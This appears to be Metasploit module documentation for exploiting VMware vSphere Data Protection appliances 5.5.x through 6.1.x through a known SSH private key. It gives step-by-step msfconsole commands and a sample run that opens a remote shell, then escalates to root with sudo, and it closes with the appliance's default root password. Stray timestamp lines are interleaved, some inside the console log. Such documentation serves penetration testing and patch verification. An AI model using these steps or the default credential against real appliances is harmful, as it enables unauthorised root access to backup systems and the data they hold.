2017-01-03 06:49:50 -05:00
## Vulnerable Application
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/ssh/vmware_vdp_known_privkey`
3. Do: `set rhost 1.2.3.4`
4. Do: `exploit`
5. You should get a shell.
6. Type: `sudo -s` to become root user
## Scenarios
This is a run against a known vulnerable vSphere Data Protection appliance.
```
msf > use exploit/linux/ssh/vmware_vdp_known_privkey
msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4
rhost => 1.2.3.4
2017-01-03 06:51:50 -05:00
msf exploit(vmware_vdp_known_privkey) > run
2017-01-03 06:49:50 -05:00
[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100
```
2017-01-03 12:51:27 -05:00
## Further Information
The default account of the appliance is root:changeme
